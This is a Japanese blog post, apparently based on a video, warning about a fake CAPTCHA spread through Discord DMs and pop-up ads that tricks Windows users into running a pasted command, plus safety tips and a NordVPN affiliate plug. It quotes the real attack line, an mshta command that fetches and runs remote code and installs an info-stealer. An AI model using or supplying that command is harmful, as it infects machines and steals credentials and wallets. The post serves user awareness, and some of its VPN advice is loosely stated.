Discordの偽CAPTCHAでPCがハッキングされる?!危険な新型マルウェアの全貌を徹底解剖!
- 2024-12-31
Discordの偽CAPTCHAでPCがハッキングされる?!危険な新型マルウェアの全貌を徹底解剖!
皆さん、こんにちは!最近、Discordを含むインターネット上で、巧妙な手口でPCをハッキングする危険な偽CAPTCHAが拡散していることをご存知でしょうか?今回は、この脅威について徹底的に分析し、皆さんに安全なインターネット利用のための情報を提供します。
この偽CAPTCHAは、一見すると通常のCAPTCHAのように見えますが、実はマルウェアをダウンロードさせるための罠なのです。 騙されてしまうと、あなたの個人情報やパスワードが盗まれる可能性があります。
偽CAPTCHAの拡散経路と事例
この偽CAPTCHAは、様々な方法でユーザーに接触してきます。
- DiscordのDM: ランダムなアカウントから、魅力的な動画やサービスへのリンクと共に送られてくることがあります。例えば、ある視聴者には人気動画へのリンクが、別の視聴者にはTikTokフォロワー増加サービスの案内が送られてきました。これらのリンクをクリックすると、偽CAPTCHAに遭遇する可能性があります。
- ダウンロード時のポップアップ広告: 動画ゲーム等のダウンロード中に、偽CAPTCHAが表示される場合があります。特に、アダルトゲームなどのダウンロードを試みた際に現れるケースが報告されています。
- 怪しいウェブサイト: 特定のウェブサイトでファイルダウンロードを試みた際に、偽CAPTCHAが表示されることもあります。
これらのケースから分かるように、攻撃者は様々な手段を用いて、不特定多数のユーザーを標的にしています。
偽CAPTCHAの実態:あなたのPCを乗っ取る危険なコード
今回調査した偽CAPTCHAは、一見すると普通のCAPTCHAと区別がつきません。「私はロボットではありません」にチェックを入れると、次のステップとして「Windowsキー+R」を押すよう指示されます。
この指示に従うと、「ファイル名を指定して実行」ダイアログが表示されます。そして、そこに悪意のあるコードが自動的に貼り付けられ、実行されるようになっています。 これは非常に危険な行為です。なぜなら、CAPTCHAがこのような操作を要求することは通常ありえないからです。
重要なポイント: CAPTCHAは、あなたのコンピューターに直接コマンドを実行させるような操作を求めることはありません!
偽CAPTCHAを解読:悪意のあるコードの分析
この偽CAPTCHAをクリックすると、クリップボードに以下のようなコードが自動的に貼り付けられます。
mshta http://heaventools.lol/recaptcha-verify#comment
このコードは、mshta.exe を使用して heaventools.lol/recaptcha-verify というウェブサイトにアクセスします。#comment はコメント部分で、実際には悪意のあるコードが実行されます。
このmshta.exeとは何か?
mshta.exe は、Windows標準のHTMLアプリケーション実行ファイルです。このコマンドを実行することで、ウェブサイト上に埋め込まれたスクリプトコードが実行されてしまうのです。つまり、この偽CAPTCHAは、一見無害な「私はロボットではありません」というチェックボックスを通じて、ユーザーのPCに悪意のあるコードを実行させているのです。
注意すべき点: このウェブサイトは、分析時点で既に閉鎖されているか、アクセスが制限されています。しかし、同様の手口を用いた偽CAPTCHAは今後も出現する可能性が高いと言えます。
偽CAPTCHA実行後の状況:仮想マシンでの検証
実際に仮想マシン上で偽CAPTCHAを実行してみました。一見すると、正常にCAPTCHA検証が完了したように見えます。しかし、実際にはバックグラウンドで何かが実行されているのが確認できました。
結果として、recaptcha_verification.exeというファイルがダウンロードされ、実行されました。このファイルは、ユーザーの個人情報を収集するマルウェアである可能性が高いです。
脅威の分析:あなたの個人情報が盗まれる!
セキュリティ専門家であるPatrickによる分析結果によると、このマルウェアは以下のような情報を盗み取ることが明らかになりました。
- パスワード: ブラウザに保存されているパスワード(Discord、Facebookなど)
- コンピューター名
- 地理位置情報
- IPアドレス
- ブックマーク
- 閲覧履歴
- 仮想通貨ウォレット情報
- Discord、Signal、Telegram、Steam、Epic Games、OBS等のアプリケーション情報
さらに、このマルウェアは、ユーザーのPCに永続的に残存し、削除が困難な場合もあります。
対策:安全なインターネット利用のために
この偽CAPTCHAの脅威から身を守るためには、以下の点を徹底することが重要です。
- 不審なリンクをクリックしない: DiscordのDMやポップアップ広告で、怪しいリンクを見つけた場合は、絶対にクリックしないでください。
- 未知のファイルを実行しない: ダウンロードしたファイルを実行する前に、そのファイルが安全であることを必ず確認してください。ウイルススキャンツールを使用することをお勧めします。
- VPNの利用: 怪しいウェブサイトにアクセスする際は、VPNを使用することで、IPアドレスを隠してDDoS攻撃などから身を守ることができます。
- ソフトウェアのアップデート: OSやブラウザなどのソフトウェアは常に最新の状態にアップデートしておきましょう。
- パスワードの定期的な変更: パスワードは定期的に変更し、強力なパスワードを使用しましょう。
Discordの正規CAPTCHAと偽CAPTCHAの見分け方
今回の事件を受けて、Discordの正規CAPTCHAと偽CAPTCHAの見分け方が非常に重要になります。
偽CAPTCHAの特徴:
- 「Windowsキー+R」などのWindows操作を要求する。
- ブックマークバーに追加するよう要求する。
- 別のウェブサイトにアクセスするよう要求する。
正規CAPTCHAは、このような操作を要求することはありません。 シンプルで、簡単に完了できるはずです。
まとめ:常に警戒を怠らず、安全なネットライフを!
今回の偽CAPTCHAの事件は、インターネット上のセキュリティリスクの高さを改めて示すものです。 常に警戒心を持ち、不審なサイトやリンクには近づかないよう注意しましょう。
この情報が、皆さんの安全なインターネット利用の一助となれば幸いです。
おまけ:NordVPNのご紹介
今回の分析では、VPNの重要性も改めて認識しました。私は、NordVPNを使用することで、怪しいウェブサイトへのアクセス時にも安心して作業を行うことができました。NordVPNは高速で、安全なインターネット環境を提供してくれる優れたサービスです。興味のある方は、ぜひ下記リンクからチェックしてみてください。
NordVPN公式サイト (紹介コード使用で追加4ヶ月無料!)
また、NordVPNは30日間返金保証があるので、安心して試すことができます。
最後まで読んでいただき、ありがとうございました! バイバイ、愛してる!ムワー!
